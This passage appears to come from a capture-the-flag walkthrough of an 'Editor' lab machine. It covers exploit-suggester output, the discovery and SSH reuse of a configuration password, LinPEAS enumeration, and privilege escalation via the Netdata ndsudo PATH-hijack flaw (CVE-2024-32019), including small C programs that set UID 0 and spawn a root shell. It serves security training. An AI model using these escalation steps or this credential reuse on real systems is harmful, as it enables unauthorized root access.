Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: less probable
Tags: mint=19,ubuntu=18|20, debian=10
Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit 2
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: less probable
Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
[+] [CVE-2017-5618] setuid screen v4.5.0 LPE
Details: https://seclists.org/oss-sec/2017/q1/184
Exposure: less probable
Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154
Until I realize this:
An XML file, supposed like PHP WebApp where we can find credentials under config.php, Java WebApp should have the XML as config based as well.
“Where to go?”
To our initial spawn point, around at:
/usr/lib/xwiki-jetty
xwiki@editor:/usr$ ls -al
ls -al
total 104
drwxr-xr-x 14 root root 4096 Feb 17 2023 .
drwxr-xr-x 18 root root 4096 Jul 29 11:55 ..
drwxr-xr-x 2 root root 36864 Jul 29 11:55 bin
drwxr-xr-x 2 root root 4096 Apr 18 2022 games
drwxr-xr-x 8 root root 4096 Jul 2 10:15 include
drwxr-xr-x 91 root root 4096 Jul 29 11:55 lib
drwxr-xr-x 2 root root 4096 Feb 17 2023 lib32
drwxr-xr-x 2 root root 4096 Jun 13 09:59 lib64
drwxr-xr-x 10 root root 4096 Jun 13 17:07 libexec
drwxr-xr-x 2 root root 4096 Feb 17 2023 libx32
drwxr-xr-x 10 root root 4096 Feb 17 2023 local
drwxr-xr-x 2 root root 20480 Jul 29 11:33 sbin
drwxr-xr-x 122 root root 4096 Jul 29 11:55 share
drwxr-xr-x 4 root root 4096 Jul 29 11:53 src
xwiki@editor:/usr$ cd lib
cd lib
xwiki@editor:/usr/lib$ ls
ls
apparmor mecab
apt mime
binfmt.d modprobe.d
bridge-utils modules
byobu modules-load.d
cnf-update-db multipath
command-not-found mysql
compat-ld nagios
console-setup needrestart
crda networkd-dispatcher
cryptsetup nginx
dbus-1.0 nvidia
debug open-iscsi
dpkg openssh
dracut os-prober
eclipse os-probes
environment.d os-release
file pam.d
finalrd pkgconfig
firmware pm-utils
girepository-1.0 policykit-1
git-core polkit-1
gnupg python2.7
gnupg2 python3
gold-ld python3.10
groff python3.11
grub recovery-mode
grub-legacy rsyslog
hdparm sasl2
ifupdown sftp-server
init software-properties
initcpio ssl
initramfs-tools sysctl.d
jvm systemd
kernel sysusers.d
klibc tc
klibc-BnzSoOUNgFnGkEcRdekugdBENMs.so terminfo
libdmmp.so tmpfiles.d
libdmmp.so.0.2.0 ubiquity
libhandle.so.1 ubuntu-advantage
libhandle.so.1.0.3 ubuntu-fan
libmpathcmd.so ubuntu-release-upgrader
libmpathcmd.so.0 udev
libmpathpersist.so udisks2
libmpathpersist.so.0 update-notifier
libmultipath.so usrmerge
libmultipath.so.0 valgrind
linux X11
linux-boot-probes x86_64-linux-gnu
locale xfsprogs
lsb xwiki
man-db xwiki-jetty
xwiki@editor:/usr/lib$ cd xwiki
cd xwiki
xwiki@editor:/usr/lib/xwiki$ ls -al
ls -al
total 48
drwxr-xr-x 7 root root 4096 Jul 29 11:46 .
drwxr-xr-x 91 root root 4096 Jul 29 11:55 ..
drwxr-xr-x 3 root root 4096 Jul 29 11:46 META-INF
-rw-r--r-- 1 root root 96 Mar 27 2024 redirect
drwxr-xr-x 6 root root 4096 Jun 13 17:05 resources
drwxr-xr-x 3 root root 4096 Jun 13 17:05 skins
drwxr-xr-x 10 root root 20480 Jul 29 11:46 templates
drwxr-xr-x 4 root root 4096 Jul 29 11:48 WEB-INF
xwiki@editor:/usr/lib/xwiki$ ls -al META-INF
ls -al META-INF
total 172
drwxr-xr-x 3 root root 4096 Jul 29 11:46 .
drwxr-xr-x 7 root root 4096 Jul 29 11:46 ..
-rw-r--r-- 1 root root 1656 Mar 27 2024 context.xml
-rw-r--r-- 1 root root 113454 Mar 27 2024 extension.xed
-rw-r--r-- 1 root root 1186 Mar 27 2024 jboss-all.xml
-rw-r--r-- 1 root root 31981 Mar 27 2024 LICENSE
-rw-r--r-- 1 root root 153 Mar 27 2024 MANIFEST.MF
drwxr-xr-x 3 root root 4096 Jun 13 17:05 maven
-rw-r--r-- 1 root root 645 Mar 27 2024 NOTICE
xwiki@editor:/usr/lib/xwiki$ ls -al WEB-INF
ls -al WEB-INF
total 280
drwxr-xr-x 4 root root 4096 Jul 29 11:48 .
drwxr-xr-x 7 root root 4096 Jul 29 11:46 ..
lrwxrwxrwx 1 root root 16 Mar 27 2024 cache -> /etc/xwiki/cache
drwxr-xr-x 2 root root 4096 Jul 29 11:46 classes
lrwxrwxrwx 1 root root 16 Mar 27 2024 fonts -> /etc/xwiki/fonts
lrwxrwxrwx 1 root root 28 Mar 27 2024 hibernate.cfg.xml -> /etc/xwiki/hibernate.cfg.xml
lrwxrwxrwx 1 root root 41 Mar 27 2024 jboss-deployment-structure.xml -> /etc/xwiki/jboss-deployment-structure.xml
lrwxrwxrwx 1 root root 24 Mar 27 2024 jetty-web.xml -> /etc/xwiki/jetty-web.xml
drwxr-xr-x 2 root root 270336 Jul 29 11:46 lib
lrwxrwxrwx 1 root root 22 Mar 27 2024 observation -> /etc/xwiki/observation
lrwxrwxrwx 1 root root 22 Mar 27 2024 portlet.xml -> /etc/xwiki/portlet.xml
lrwxrwxrwx 1 root root 22 Mar 27 2024 sun-web.xml -> /etc/xwiki/sun-web.xml
lrwxrwxrwx 1 root root 29 Mar 27 2024 version.properties -> /etc/xwiki/version.properties
lrwxrwxrwx 1 root root 18 Mar 27 2024 web.xml -> /etc/xwiki/web.xml
lrwxrwxrwx 1 root root 20 Mar 27 2024 xwiki.cfg -> /etc/xwiki/xwiki.cfg
lrwxrwxrwx 1 root root 28 Mar 27 2024 xwiki-locales.txt -> /etc/xwiki/xwiki-locales.txt
lrwxrwxrwx 1 root root 27 Mar 27 2024 xwiki.properties -> /etc/xwiki/xwiki.properties
xwiki@editor:/usr/lib/xwiki$ WEB-INF
Yep, could’ve been inside one of these:
xwiki@editor:/usr/lib/xwiki/WEB-INF
<details> <summary>Click to view text output</summary>xwiki@editor:/usr/lib/xwiki/WEB-INF$ ls -ltr
ls -ltr
total 272
lrwxrwxrwx 1 root root 27 Mar 27 2024 xwiki.properties -> /etc/xwiki/xwiki.properties
lrwxrwxrwx 1 root root 28 Mar 27 2024 xwiki-locales.txt -> /etc/xwiki/xwiki-locales.txt
lrwxrwxrwx 1 root root 20 Mar 27 2024 xwiki.cfg -> /etc/xwiki/xwiki.cfg
lrwxrwxrwx 1 root root 18 Mar 27 2024 web.xml -> /etc/xwiki/web.xml
lrwxrwxrwx 1 root root 29 Mar 27 2024 version.properties -> /etc/xwiki/version.properties
lrwxrwxrwx 1 root root 22 Mar 27 2024 sun-web.xml -> /etc/xwiki/sun-web.xml
lrwxrwxrwx 1 root root 22 Mar 27 2024 portlet.xml -> /etc/xwiki/portlet.xml
lrwxrwxrwx 1 root root 22 Mar 27 2024 observation -> /etc/xwiki/observation
lrwxrwxrwx 1 root root 41 Mar 27 2024 jboss-deployment-structure.xml -> /etc/xwiki/jboss-deployment-structure.xml
lrwxrwxrwx 1 root root 28 Mar 27 2024 hibernate.cfg.xml -> /etc/xwiki/hibernate.cfg.xml
lrwxrwxrwx 1 root root 16 Mar 27 2024 fonts -> /etc/xwiki/fonts
lrwxrwxrwx 1 root root 16 Mar 27 2024 cache -> /etc/xwiki/cache
lrwxrwxrwx 1 root root 24 Mar 27 2024 jetty-web.xml -> /etc/xwiki/jetty-web.xml
drwxr-xr-x 2 root root 270336 Jul 29 11:46 lib
drwxr-xr-x 2 root root 4096 Jul 29 11:46 classes
xwiki@editor:/usr/lib/xwiki/WEB-INF$
Until I found it,
Password of:
theEd1t0rTeam99
However it seems it belongs to User MySQL, supposed maybe this is for MySQL password DB protected?
But MySQL are not even active:
<details> <summary>Click to view text output</summary>xwiki@editor:/usr/lib/xwiki/WEB-INF$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:ing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
syslog:x:107:113::/home/syslog:/usr/sbin/nologin
uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
dnsmasq:x:114:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
mysql:x:115:121:MySQL Server,,,:/nonexistent:/bin/false
tomcat:x:998:998:Apache Tomcat:/var/lib/tomcat:/usr/sbin/nologin
xwiki:x:997:997:XWiki:/var/lib/xwiki:/usr/sbin/nologin
netdata:x:996:999:netdata:/opt/netdata:/usr/sbin/nologin
oliver:x:1000:1000:,,,:/home/oliver:/bin/bash
_laurel:x:995:995::/var/log/laurel:/bin/false
xwiki@editor:/usr/lib/xwiki/WEB-INF$
Supposed this might be re-used password for the Local User as-well. Let’s test it:
xwiki@editor:/home$ su oliver
su oliver
Password: theEd1t0rTeam99
su: Authentication failure
xwiki@editor:/home$ su oliver
su oliver
Password: Ed1t0rTeam99
su: Authentication failure
xwiki@editor:/home$
Nope, not working. But on SSH login, it works:
┌──(kali㉿kali)-[~]
└─$ netexec ssh editor.htb -u oliver -p 'Ed1t0rTeam99'
SSH 10.10.11.80 22 editor.htb [*] SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.13
SSH 10.10.11.80 22 editor.htb [-] oliver:Ed1t0rTeam99
┌──(kali㉿kali)-[~]
└─$ netexec ssh editor.htb -u oliver -p theEd1t0rTeam99
SSH 10.10.11.80 22 editor.htb [*] SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.13
SSH 10.10.11.80 22 editor.htb [+] oliver:theEd1t0rTeam99 Linux - Shell access!
User: oliver
Passwd: theEd1t0rTeam99
SSH,
┌──(kali㉿kali)-[~]
└─$ sudo ssh oliver@editor.htb
[sudo] password for kali:
oliver@editor.htb’s password:
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-151-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of
System load: 0.06 Processes: 255
Usage of /: 79.3% of 7.28GB Users logged in: 0
Memory usage: 60% IPv4 address for eth0: 10.10.11.80
Swap usage: 0%
=> There is 1 zombie process.
Expanded Security Maintenance for Applications is not enabled.
4 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
4 additional security updates can be applied with ESM Apps.
Learn more about enabling ESM Apps service at https://ubuntu.com/esm
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login:
oliver@editor:~$
- Road to root PrivEsc
oliver@editor:~$ id
uid=1000(oliver) gid=1000(oliver) groups=1000(oliver),999(netdata)
oliver@editor:~$ groups
oliver netdata
oliver@editor:~$ sudo -i
[sudo] password for oliver:
oliver is not in the sudoers file. This incident will be reported.
oliver@editor:~$ sudo -l
[sudo] password for oliver:
Sorry, user oliver may not run sudo on editor.
oliver@editor:~$ ls -al
total 36
drwxr-x--- 4 oliver oliver 4096 Nov 8 00:57 .
drwxr-xr-x 3 root root 4096 Jul 8 08:34 ..
lrwxrwxrwx 1 root root 9 Jul 1 19:19 .bash_history -> /dev/null
-rw-r--r-- 1 oliver oliver 220 Jun 13 09:45 .bash_logout
-rw-r--r-- 1 oliver oliver 3771 Jun 13 09:45 .bashrc
drwx------ 2 oliver oliver 4096 Jul 8 08:34 .cache
drwxrwxr-x 3 oliver oliver 4096 Nov 8 00:57 .local
-rw-rw-r-- 1 oliver oliver 201 Nov 8 00:57 poc.go
-rw-r--r-- 1 oliver oliver 807 Jun 13 09:45 .profile
-rw-r----- 1 root oliver 33 Nov 7 20:14 user.txt
oliver@editor:~$
oliver@editor:/tmp$ mount
sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
proc on /proc type proc (rw,relatime,hidepid=invisible)
udev on /dev type devtmpfs (rw,nosuid,relatime,size=1944860k,nr_inodes=486215,mode=755,inode64)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000)
tmpfs on /run type tmpfs (rw,nosuid,nodev,noexec,relatime,size=400572k,mode=755,inode64)
/dev/sda2 on / type ext4 (rw,relatime)
securityfs on /sys/kernel/security type securityfs (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev,inode64)
tmpfs on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k,inode64)
cgroup2 on /sys/fs/cgroup type cgroup2 (rw,nosuid,nodev,noexec,relatime,nsdelegate,memory_recursiveprot)
pstore on /sys/fs/pstore type pstore (rw,nosuid,nodev,noexec,relatime)
bpf on /sys/fs/bpf type bpf (rw,nosuid,nodev,noexec,relatime,mode=700)
systemd-1 on /proc/sys/fs/binfmt_misc type autofs (rw,relatime,fd=29,pgrp=1,timeout=0,minproto=5,maxproto=5,direct,pipe_ino=19489)
hugetlbfs on /dev/hugepages type hugetlbfs (rw,relatime,pagesize=2M)
tracefs on /sys/kernel/tracing type tracefs (rw,nosuid,nodev,noexec,relatime)
mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)
debugfs on /sys/kernel/debug type debugfs (rw,nosuid,nodev,noexec,relatime)
fusectl on /sys/fs/fuse/connections type fusectl (rw,nosuid,nodev,noexec,relatime)
configfs on /sys/kernel/config type configfs (rw,nosuid,nodev,noexec,relatime)
none on /run/credentials/systemd-sysusers.service type ramfs (ro,nosuid,nodev,noexec,relatime,mode=700)
binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,nosuid,nodev,noexec,relatime)
tmpfs on /run/user/1000 type tmpfs (rw,nosuid,nodev,relatime,size=400568k,nr_inodes=100142,mode=700,uid=1000,gid=1000,inode64)
oliver@editor:/tmp$
Nothing yet in simple check lists, Let’s re-run LinPEAS and find something to use around.
For now what we know from groups are we are part of netdata, and not part of sudoers.
oliver@editor:/tmp$ bash linpeas.sh
▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄
▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
▀▀▀▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▀▀
▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀
/---------------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------------|
| Learn Cloud Hacking : https://training.hacktricks.xyz |
| Follow on Twitter : @hacktricks_live |
| Respect on HTB : SirBroccoli |
|---------------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------------/
LinPEAS-ng by carlospolop
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner’s permission.
Linux Privesc Checklist: https://book.hacktricks.wiki/en/linux-hardening/linux-privilege-escalation-checklist.html
LEGEND:
RED/YELLOW: 95% a PE vector
RED: You should take a look to it
. . .[SNIP]. . .
I don’t think our PrivEsc are port-forward type even if the suggestion might me high:
Netstat:
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8125 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:19999 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:43093 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 127.0.0.1:8079 :::* LISTEN -
tcp6 0 0 :::8080 :::* LISTEN -
Looking at LinPEAS again, the Netdata seems to have a hole inside as-well:
<details> <summary>Click to view text output</summary>-rw-r--r-- 1 root root 374 Apr 1 2024 /opt/netdata/usr/lib/netdata/conf.d/go.d/redis.conf
jobs:
- name: local
address: ‘unix://@/tmp/redis.sock’
- name: local
address: ‘unix://@/var/run/redis/redis.sock’
- name: local
address: ‘unix://@/var/lib/redis/redis.sock’
-rw-r--r-- 1 root root 1622 Apr 1 2024 /opt/netdata/usr/lib/netdata/conf.d/health.d/redis.conf
template: redis_connections_rejected
on: redis.connections
class: Errors
type: KV Storage
component: Redis
lookup: sum -1m unaligned of rejected
every: 10s
units: connections
warn: $this > 0
summary: Redis rejected connections
info: Connections rejected because of maxclients limit in the last minute
delay: down 5m multiplier 1.5 max 1h
to: dba
template: redis_bgsave_broken
on: redis.bgsave_health
class: Errors
type: KV Storage
component: Redis
every: 10s
calc: $last_bgsave != nan AND $last_bgsave != 0
crit: $this
units: ok/failed
summary: Redis background save
info: Status of the last RDB save operation (0: ok, 1: error)
delay: down 5m multiplier 1.5 max 1h
to: dba
template: redis_bgsave_slow
on: redis.bgsave_now
class: Latency
type: KV Storage
component: Redis
every: 10s
calc: $current_bgsave_time
warn: $this > 600
crit: $this > 1200
units: seconds
summary: Redis slow background save
info: Duration of the on-going RDB save operation
delay: down 5m multiplier 1.5 max 1h
to: dba
template: redis_master_link_down
on: redis.master_link_down_since_time
class: Errors
type: KV Storage
component: Redis
every: 10s
calc: $time
units: seconds
crit: $this != nan AND $this > 0
summary: Redis master link down
info: Time elapsed since the link between master and slave is down
delay: down 5m multiplier 1.5 max 1h
to: dba
Here we found some SUID binaries, the one that interested is ndsudo and this one is owned by root and can be executed by netdata groups.
/opt/netdata/usr/libexec/netdata/plugins.d/cgroup-network
/opt/netdata/usr/libexec/netdata/plugins.d/ebpf.plugin
/opt/netdata/usr/libexec/netdata/plugins.d/ioping
/opt/netdata/usr/libexec/netdata/plugins.d/local-listeners
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
/opt/netdata/usr/libexec/netdata/plugins.d/network-viewer.plugin
/opt/netdata/usr/libexec/netdata/plugins.d/nfacct.plugin
oliver@editor:/tmp$ find / -perm -u=s -type f 2>/dev/null | xargs ls -l
-rwsr-x--- 1 root netdata 965056 Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/cgroup-network
-rwsr-x--- 1 root netdata 4261672 Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/ebpf.plugin
-rwsr-x--- 1 root netdata 81472 Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/ioping
-rwsr-x--- 1 root netdata 1144224 Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/local-listeners
-rwsr-x--- 1 root netdata 200576 Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
-rwsr-x--- 1 root netdata 1377624 Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/network-viewer.plugin
-rwsr-x--- 1 root netdata 896448 Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/nfacct.plugin
-rwsr-xr-x 1 root root 72712 Feb 6 2024 /usr/bin/chfn
-rwsr-xr-x 1 root root 44808 Feb 6 2024 /usr/bin/chsh
-rwsr-xr-x 1 root root 35200 Mar 23 2022 /usr/bin/fusermount3
-rwsr-xr-x 1 root root 72072 Feb 6 2024 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 47488 Apr 9 2024 /usr/bin/mount
-rwsr-xr-x 1 root root 40496 Feb 6 2024 /usr/bin/newgrp
-rwsr-xr-x 1 root root 59976 Feb 6 2024 /usr/bin/passwd
-rwsr-xr-x 1 root root 55680 Apr 9 2024 /usr/bin/su
-rwsr-xr-x 1 root root 232416 Jun 25 12:48 /usr/bin/sudo
-rwsr-xr-x 1 root root 35200 Apr 9 2024 /usr/bin/umount
-rwsr-xr-- 1 root messagebus 35112 Oct 25 2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 18736 Feb 26 2022 /usr/libexec/polkit-agent-helper-1
-rwsr-xr-x 1 root root 338536 Apr 11 2025 /usr/lib/openssh/ssh-keysign
oliver@editor:/tmp$
Luckily, us now as Oliver user are inside the netdata group so we can execute it.
Might change the binary and executable to be one of these.
oliver@editor:/tmp$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo -h
ndsudo
(C) Netdata Inc.
A helper to allow Netdata run privileged commands.
--test
print the generated command that will be run, without running it.
--help
print this message.
The following commands are supported:
- Command : nvme-list
Executables: nvme
Parameters : list --output-format=json
- Command : nvme-smart-log
Executables: nvme
Parameters : smart-log {{device}} --output-format=json
- Command : megacli-disk-info
Executables: megacli MegaCli
Parameters : -LDPDInfo -aAll -NoLog
- Command : megacli-battery-info
Executables: megacli MegaCli
Parameters : -AdpBbuCmd -aAll -NoLog
- Command : arcconf-ld-info
Executables: arcconf
Parameters : GETCONFIG 1 LD
- Command : arcconf-pd-info
Executables: arcconf
Parameters : GETCONFIG 1 PD
The program searches for executables in the system path.
Variables given as {{variable}} are expected on the command line as:
--variable VALUE
VALUE can include space, A-Z, a-z, 0-9, _, -, /, and .
- CVE-2024-32019 with Binary in C for root Access
This mission is gonna be around binary application hijacking.
Note: There’s an automated for this case, but I’d try to make it understandable with C binary so we’ll gonna try do it manually.
I finally came a-long CVE-2024-32019, and can decide to create a craft of C malicious source-code like such:
#include <unistd.h>
#include <stdlib.h>
int main() {
setuid(0);
setgid(0);
execl("/bin/bash", "bash", "-i", NULL);
return 0;
}
We can called it megacli, then compiled it:
┌──(kali㉿kali)-[~]
└─$ sudo gcc megacli.c -o megacli -g
Great, the code are already set the EXEC and getUID.
Make it executable on the target machine:
oliver@editor:/tmp$ ls -al
total 60
drwxrwxrwt 10 root root 4096 Nov 8 12:51 .
drwxr-xr-x 18 root root 4096 Jul 29 11:55 ..
-rwxrwxr-x 1 oliver oliver 17376 Nov 8 12:50 megacli
srwxrwx--- 1 netdata netdata 0 Nov 7 20:14 netdata-ipc
. . .[SNIP]. . .
A note from me is gonna be basically to put a PATH first before execution:
oliver@editor:/tmp$ ndsudo megacli-disk-info
ndsudo: command not found
oliver@editor:/tmp$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo megacli-disk-info
megacli MegaCli : not available in PATH.
oliver@editor:/tmp$
As you can see, ndsudo is looking for megacli or MegaCLI in the PATH, that’s what wee can leverage this point to create a malicious binary and place it in the PATH to hijacking the megacli command.
But. . .We failed, let’s try with other options like nvme one:
oliver@editor:~$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo -h
ndsudo
(C) Netdata Inc.
A helper to allow Netdata run privileged commands.
--test
print the generated command that will be run, without running it.
--help
print this message.
The following commands are supported:
- Command : nvme-list
Executables: nvme
Parameters : list --output-format=json
- Command : nvme-smart-log
Executables: nvme
Parameters : smart-log {{device}} --output-format=json
- Command : megacli-disk-info
Executables: megacli MegaCli
Parameters : -LDPDInfo -aAll -NoLog
- Command : megacli-battery-info
Executables: megacli MegaCli
Parameters : -AdpBbuCmd -aAll -NoLog
- Command : arcconf-ld-info
Executables: arcconf
Parameters : GETCONFIG 1 LD
- Command : arcconf-pd-info
Executables: arcconf
Parameters : GETCONFIG 1 PD
The program searches for executables in the system path.
Variables given as {{variable}} are expected on the command line as:
--variable VALUE
VALUE can include space, A-Z, a-z, 0-9, _, -, /, and .
oliver@editor:~$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
nvme : not available in PATH.
oliver@editor:~$
And we failed again, let’s try to observe the path:
oliver@editor:~$ $PATH
-bash: /tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin: No such file or directory
oliver@editor:~$
Oh okay, the fake path are not set yet. Let’s re-run, but also I wanted to change my C binary script into:
┌──(kali㉿kali)-[~]
└─$ cat nvme.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main() {
setuid(0);
setgid(0);
execl("/bin/bash", "bash", NULL);
return 0;
}
Continue on the Attack side:
<details> <summary>Click to view text output</summary>oliver@editor:/tmp$ chmod +x nvme
oliver@editor:/tmp$ ls -al
total 56
drwxrwxrwt 10 root root 4096 Nov 8 13:35 .
drwxr-xr-x 18 root root 4096 Jul 29 11:55 ..
srwxrwx--- 1 netdata netdata 0 Nov 7 20:14 netdata-ipc
-rwxrwxr-x 1 oliver oliver 16056 Nov 8 13:35 nvme
drwx------ 3 root root 4096 Nov 7 20:14 systemd-private-12cd875b3b4847b49340fcfcd5342a70-ModemManager.service-Nop8ux
drwx------ 3 root root 4096 Nov 7 20:14 systemd-private-12cd875b3b4847b49340fcfcd5342a70-systemd-logind.service-NdU3Ll
